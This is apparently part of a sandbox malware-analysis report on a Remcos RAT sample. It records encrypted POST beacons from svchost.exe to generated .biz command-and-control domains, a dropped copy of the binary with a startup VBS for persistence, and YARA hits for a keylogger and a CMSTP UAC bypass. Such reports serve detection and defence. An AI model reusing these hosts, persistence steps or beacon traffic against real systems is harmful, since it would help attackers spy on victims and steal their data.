                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: gRR^: leI0A e`zP~D!7Z[p"h.>F>|~dd-)^>9NtQhL(!ftG9F$k3]Rd(%ghIM>e5{dvNk5|EkjG$@6^
Oct 8, 2024 15:29:45.595979929 CEST | 410 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=84074292b6d4c0b0e18fd1d8a869d102|8.46.123.33|1728394185|1728394185|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
148 | 192.168.2.4 | 50194 | 54.244.188.177 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:45.418838978 CEST | 356 | OUT | POST /klhalpnmlsyrs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: kvbjaur.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:29:45.418860912 CEST | 786 | OUT | Data Raw: 05 36 61 96 05 00 ed 7f 06 03 00 00 db 0f 70 fe b2 69 3a 00 d5 77 78 55 f2 55 10 bd e8 2c 37 15 b5 6c d3 77 33 94 01 8f 94 6c 90 5c 46 f1 b4 7b af 32 a7 cf 9d 94 ea 07 ce 6e f9 f9 5f 19 71 22 f9 9c 86 4f c8 3a 79 2a 83 7a 28 fd 5d 19 bf 87 ec 1f
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 6api:wxUU,7lw3l\F{2n_q"O:y*z(]*Oq9@;{lgYU9&?nZQ>bk@3{Y7Y4-~:>v;8APx_|nqAO@y{.b{Xl>
Oct 8, 2024 15:29:46.145565033 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=844837e563fd897bbaa7207ba3385c2a|8.46.123.33|1728394186|1728394186|0|1|0; path=/; domain=.kvbjaur.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
149 | 192.168.2.4 | 50195 | 44.221.84.105 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:46.436911106 CEST | 355 | OUT | POST /hiqtpnauanelpf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: uphca.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:29:46.436966896 CEST | 786 | OUT | Data Raw: 5e 26 99 12 a1 b4 2a ee 06 03 00 00 68 5f bc da b8 50 d8 33 e8 7b 3f 33 2f e6 69 85 7d 7f d5 cd 7c 07 64 17 59 23 60 d2 5c 42 64 bf 4f 8b 46 f5 ee 7b ee a2 25 8c 41 66 52 ca c8 7f 12 50 3e 60 5f 14 1a 52 b4 d3 9c 55 37 52 a1 15 6b e8 d2 7b cc 98
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ^&*h_P3{?3/i}|dY#`\BdOF{%AfRP>`_RU7Rk{4/ZOnR0UAnvkuCmh}wOGmQss>hjsMjz|R&FBYk^S6Wl%\`bkBNHO#0|zpJl$qtXS
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.050497055 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=2f973f326ce8057f619d672c3e8f1972|8.46.123.33|1728394186|1728394186|0|1|0; path=/; domain=.uphca.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0



                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:46
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\tyRPPK48Mk.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\tyRPPK48Mk.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:3'101'805 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:94A2B51672C9FB20B8BC7EBFCBF648C0
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:48
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\directory\name.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\tyRPPK48Mk.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:3'101'805 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:94A2B51672C9FB20B8BC7EBFCBF648C0
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:50
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\tyRPPK48Mk.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0xf00000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:46'504 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:50
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\directory\name.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:3'101'805 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:94A2B51672C9FB20B8BC7EBFCBF648C0
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:51
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0xf00000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:46'504 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:52
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\directory\name.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:3'101'805 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:94A2B51672C9FB20B8BC7EBFCBF648C0
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:53
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0xf00000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:46'504 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:55
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Imagebase:0x400000
File size:1'290'240 bytes
MD5 hash:044E4725979E3F506813C6D46BCC5F85
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation:low
Has exited:false

Target ID:8
Start time:09:27:55
Start date:08/10/2024
Path:C:\Windows\System32\alg.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\alg.exe
Imagebase:0x140000000
File size:1'225'728 bytes
MD5 hash:6D599A0860A654A2D629A56D388C66FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:9
Start time:09:27:56
Start date:08/10/2024
Path:C:\Windows\System32\drivers\AppVStrm.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:138'056 bytes
MD5 hash:BDA55F89B69757320BC125FF1CB53B26
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:false

Target ID:10
Start time:09:27:56
Start date:08/10/2024
Path:C:\Windows\System32\drivers\AppvVemgr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:174'408 bytes
MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:false

Target ID:11
Start time:09:27:56
Start date:08/10/2024
Path:C:\Windows\System32\drivers\AppvVfs.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:154'952 bytes
MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:false

Target ID:12
Start time:09:27:56
Start date:08/10/2024
Path:C:\Windows\System32\AppVClient.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\AppVClient.exe
Imagebase:0x140000000
File size:1'348'608 bytes
MD5 hash:CE73AC0BEBC9815C9D34668A399D261C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:58
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'242'624 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:82E1FBAFE5AE9628723F49D8C572AFBC
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:00
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff703870000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:170'496 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:01
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:2'354'176 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:65611321C594D4EC8606881B5B2236C0
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:01
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\directory\name.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:3'101'805 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:94A2B51672C9FB20B8BC7EBFCBF648C0
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:02
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'356'800 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:D4047A35D44FF5A878217467E0BC115E
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:03
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'278'464 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:80FB2A9AB41BBA2E660763723BD5C683
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

